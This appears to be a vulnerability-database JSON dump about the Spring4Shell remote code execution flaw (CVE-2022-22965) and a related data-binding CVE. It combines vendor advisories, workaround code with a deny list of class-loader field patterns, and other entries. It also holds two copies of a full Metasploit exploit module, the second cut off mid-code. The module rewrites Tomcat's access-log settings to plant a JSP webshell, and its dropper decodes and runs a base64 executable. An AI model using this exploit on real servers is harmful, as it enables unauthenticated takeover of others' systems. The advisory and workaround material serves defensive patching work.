\t\t\t@Override\n \t\t\tpublic RequestMappingHandlerAdapter getRequestMappingHandlerAdapter() {\n \t\t\t\treturn new ExtendedRequestMappingHandlerAdapter();\n \t\t\t}\n \t\t};\n \t}\n \n \n \tprivate static class ExtendedRequestMappingHandlerAdapter extends RequestMappingHandlerAdapter {\n \n \t\t@Override\n \t\tprotected InitBinderDataBinderFactory createDataBinderFactory(List<InvocableHandlerMethod> methods) {\n \n \t\t\treturn new ServletRequestDataBinderFactory(methods, getWebBindingInitializer()) {\n \n \t\t\t\t@Override\n \t\t\t\tprotected ServletRequestDataBinder createBinderInstance(\n \t\t\t\t\t\tObject target, String name, NativeWebRequest request) throws Exception {\n \t\t\t\t\t\n \t\t\t\t\tServletRequestDataBinder binder = super.createBinderInstance(target, name, request);\n \t\t\t\t\tString[] fields = binder.getDisallowedFields();\n \t\t\t\t\tList<String> fieldList = new ArrayList<>(fields != null ? Arrays.asList(fields) : Collections.emptyList());\n \t\t\t\t\tfieldList.addAll(Arrays.asList(\"class.*\", \"Class.*\", \"*.class.*\", \"*.Class.*\"));\n \t\t\t\t\tbinder.setDisallowedFields(fieldList.toArray(new String[] {}));\n \t\t\t\t\treturn binder;\n \t\t\t\t}\n \t\t\t};\n \t\t}\n \t}\n }\n \n \n\nFor Spring MVC without Spring Boot, an application can switch from `@EnableWebMvc` to extending `DelegatingWebMvcConfiguration` directly as described in [Advanced Config](<https://docs.spring.io/spring-framework/docs/current/reference/html/web.html#mvc-config-advanced-java>) section of the documentation, then overriding the `createRequestMappingHandlerAdapter` method.\n\n### Misconceptions\n\nThere was speculation surrounding the commit to deprecate `SerializationUtils`. This class has only one usage within the framework and is not exposed to external input. The deprecation is unrelated to this vulnerability.\n\nThere was confusion with a [CVE for Spring Cloud Function](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) which was released just before the report for this vulnerability. It is also unrelated.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T10:27:00", "type": "spring", "title": "Spring Framework RCE, Early Announcement", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-22968"], "modified": "2022-03-31T10:27:00", "id": "SPRING:DA8F6AA20460EB2D550732A7F74584F6", "href": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T14:58:04", "description": "## Table of Contents\n\n * Overview\n * Does This Affect My Application?\n * Reassessing Your Data Binding Approach\n\n### Overview\n\nWhile investigating the [Spring Framework RCE vulnerability CVE-2022-22965](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and the suggested workaround, we realized that the `disallowedFields` configuration setting on `WebDataBinder` is not intuitive and is not clearly documented. We have fixed that but also decided to be on the safe side and announce a follow-up CVE, in order to ensure application developers are alerted and have a chance to review their configuration.\n\n * [CVE-2022-22968: Spring Framework Data Binding Rules Vulnerability](<https://tanzu.vmware.com/security/cve-2022-22968>)\n\nWe have released [Spring Framework 5.3.19 and 5.2.21](<https://spring.io/blog/2022/04/13/spring-framework-5-3-19-and-5-2-21-available-now>) which contain the fix. Spring Boot 2.6.7 and 2.5.13 are scheduled to be released on April 21, 2022.\n\n> Until Spring Boot 2.6.7 and 2.5.13 have been released, you should manually upgrade the Spring Framework dependency in your Spring Boot application. To override the Spring Framework version in your Maven or Gradle build, you should use the `spring-framework.version` property.\n> \n> Please see the documentation for the Spring Boot [Maven plugin](<https://docs.spring.io/spring-boot/docs/current/maven-plugin/reference/htmlsingle/#using.parent-pom>) and [Gradle plugin](<https://docs.spring.io/spring-boot/docs/current/gradle-plugin/reference/htmlsingle/#managing-dependencies.dependency-management-plugin.customizing>) for details.\n\nPrior to the fix in today's releases, the patterns for `disallowedFields` in a `DataBinder` were _case sensitive_ which means a field was not effectively protected unless patterns were registered with both upper and lower case for the first character of the field, including all combinations of upper and lower case for the first character of all nested fields within the property path.\n\nFor example, if you've seen the [Disallowed Fields](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#disallowed-fields>) workaround for the RCE vulnerability, you might have wondered why the disallowed field patterns included seemingly duplicate entries. Each pattern had to be registered twice, once with the first character in lowercase, and again with the first character in uppercase. The fix we've released today addresses this by ignoring case when matching against disallowed field patterns. This has the added benefit of disallowing binding to a `firstName` property when the registered pattern is `firstname`. In other words, the changes we've made not only fix the vulnerability reported in the CVE, but they also make disallowed field patterns more robust in general.\n\n### Does This Affect My Application?\n\nThese are the necessary conditions for the specific vulnerability:\n\n * Registration of _disallowed field patterns_ in a `DataBinder`\n * `spring-webmvc` or `spring-webflux` dependency\n * Spring Framework versions 5.3.0 to 5.3.18, 5.2.0 to 5.2.20, and older versions\n\nAdditional notes:\n\n * The issue relates to data binding used to populate an object from request parameters (either query parameters or form data). Data binding is used for controller method parameters that are annotated with `@ModelAttribute` or optionally without it, and without any other Spring Web annotation.\n * The issue does not relate to `@RequestBody` controller method parameters (e.g. JSON deserialization). However, such methods may still be vulnerable if they have another method parameter populated via data binding from query parameters.\n * Your Spring MVC or Spring WebFlux application may be susceptible to data binding issues even if you do not register _disallowed field patterns_. We highly encourage you to review your `DataBinder` configuration and more broadly your approach to data binding. For more details, please see the new [Data Binding Model Design](<https://docs.spring.io/spring-framework/docs/current/reference/html/web.html#mvc-ann-initbinder-model-design>) section in the Spring Framework reference manual.\n\n### Reassessing Your Data Binding Approach\n\nIf you're using _disallowed field patterns_ and plan to continue using them, you should definitely update to Spring Framework **5.3.19** and **5.2.21** or greater as soon as possible. \n\nHowever, there are alternatives to relying on _disallowed field patterns_. As discussed in the new [Model Design](<https://docs.spring.io/spring-framework/docs/current/reference/html/web.html#mvc-ann-initbinder-model-design>) section in the reference manual, our recommended approach is to use a _dedicated model object_ that exposes only properties that are relevant for the supported use case. Another alternative is to switch to _allowed field patterns_: instead of supplying a "deny list" via `setDisallowedFields()`, you can supply an explicit "allow list" via `setAllowedFields()` in a `WebDataBinder`.\n\nKeep in mind that it is strongly recommended that you do **not** use types from your domain model such as JPA or Hibernate entities as the model object in data binding scenarios.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T13:00:00", "type": "spring", "title": "Spring Framework Data Binding Rules Vulnerability (CVE-2022-22968)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-22968"], "modified": "2022-04-13T13:00:00", "id": "SPRING:0A31867D9351CED0BD42C5AD9FB90F8C", "href": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-05-16T19:23:58", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.\n", "cvss3": {}, "published": "2022-04-07T13:22:18", "type": "metasploit", "title": "Spring Framework Class property RCE (Spring4Shell)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-13T13:16:01", "id": "MSF:EXPLOIT/MULTI/HTTP/SPRING_FRAMEWORK_RCE_SPRING4SHELL/", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/spring_framework_rce_spring4shell/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Retry\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_truthy(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once is dropped\n # to the log file\n def fix(jsp)\n output = ''\n jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = _check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/spring_framework_rce_spring4shell.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2022-05-18T05:36:06", "description": "Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. \n\n## Impact\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n- JDK 9 or higher\n- Apache Tomcat as the Servlet container\n- Packaged as WAR\n- `spring-webmvc` or `spring-webflux` dependency\n\n## Patches\n\n- Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE)\n- Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)\n\n## Workarounds\n\nFor those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:30:50", "type": "osv", "title": "Remote Code Execution in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-18T04:18:18", "id": "OSV:GHSA-36P3-WJMG-H94X", "href": "https://osv.dev/vulnerability/GHSA-36p3-wjmg-h94x", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2022-04-08T19:45:16", "description": "Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability. Threat analysis of the \u2026\n\n[ Microsoft\u2019s Response to CVE-2022-22965 Spring Framework Read More \u00bb](<https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T23:41:01", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T23:41:01", "id": "MSRC:A49EE2D875C0E490BD326B3CDDB7399F", "href": "https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2022-05-10T17:37:29", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "zdt", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "1337DAY-ID-37692", "href": "https://0day.today/exploit/description/37692", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_true(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once is dropped\n # to the log file\n def fix(jsp)\n output = ''\n 